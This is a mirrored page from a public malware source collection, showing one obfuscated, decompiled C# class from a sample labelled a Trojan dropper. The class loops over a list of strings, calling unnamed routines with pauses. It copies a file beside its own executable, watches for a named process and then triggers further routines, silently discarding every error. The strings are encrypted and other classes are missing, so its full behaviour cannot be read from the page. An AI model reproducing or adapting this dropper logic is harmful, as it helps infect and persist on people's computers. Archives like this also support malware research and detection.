mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
142 lines
3.0 KiB
C#
142 lines
3.0 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
|||
|
|
|||
|
using \u0001;
|
|||
|
using \u0008;
|
|||
|
using \u000E;
|
|||
|
using \u000F;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
namespace \u0008
|
|||
|
{
|
|||
|
internal sealed class \u0004
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal static \u0002 \u0001;
|
|||
|
|
|||
|
public static void \u000F()
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
\u000F.\u0008.\u0010(\u0004.\u0001(2386));
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (string str in \u000F.\u0001.\u0001.\u0003)
|
|||
|
{
|
|||
|
\u0004.\u000F(str);
|
|||
|
Thread.Sleep(2000);
|
|||
|
\u0004.\u0010(str);
|
|||
|
Thread.Sleep(2000);
|
|||
|
\u0004.\u0011(str);
|
|||
|
Thread.Sleep(2000);
|
|||
|
\u0004.\u0012(str);
|
|||
|
Thread.Sleep(2000);
|
|||
|
\u0004.\u0013(str);
|
|||
|
Thread.Sleep(2000);
|
|||
|
\u0004.\u0014(str);
|
|||
|
Thread.Sleep(2000);
|
|||
|
\u0004.\u0015(str);
|
|||
|
Thread.Sleep(2000);
|
|||
|
\u0004.\u0016(str);
|
|||
|
Thread.Sleep(2000);
|
|||
|
\u0004.\u0017(str);
|
|||
|
Thread.Sleep(2000);
|
|||
|
\u0004.\u0018(str);
|
|||
|
Thread.Sleep(2000);
|
|||
|
\u0004.\u0019(str);
|
|||
|
Thread.Sleep(2000);
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
\u0007.\u000F();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
\u0007.\u0011();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
\u0005.\u000F();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
if (\u000F.\u0001.\u0001.\u0001 != \u0004.\u0001(910))
|
|||
|
{
|
|||
|
string str1 = \u000F.\u0001.\u0001.\u0001;
|
|||
|
string str2 = \u000F.\u0001.\u0001.\u0002;
|
|||
|
\u0002.\u000F(str1 + \u0004.\u0001(1908) + str2 + \u0004.\u0001(2399), Path.GetDirectoryName(Assembly.GetEntryAssembly().Location) + str2 + \u0004.\u0001(2399));
|
|||
|
}
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
label_15:
|
|||
|
try
|
|||
|
{
|
|||
|
foreach (Process process in Process.GetProcesses())
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (process.ProcessName == \u0004.\u0001(2412))
|
|||
|
goto label_20;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
Thread.Sleep(800);
|
|||
|
continue;
|
|||
|
label_20:
|
|||
|
string[] strArray1 = \u000F.\u0001.\u0001.\u0001;
|
|||
|
string[] strArray2 = \u000F.\u0001.\u0001.\u0002;
|
|||
|
try
|
|||
|
{
|
|||
|
\u0006.\u000F(strArray1, strArray2);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
try
|
|||
|
{
|
|||
|
\u0006.\u000F(strArray1, strArray2, 5000);
|
|||
|
return;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
return;
|
|||
|
}
|
|||
|
}
|
|||
|
goto label_15;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
static \u0004() => \u0003.\u000F();
|
|||
|
}
|
|||
|
}
|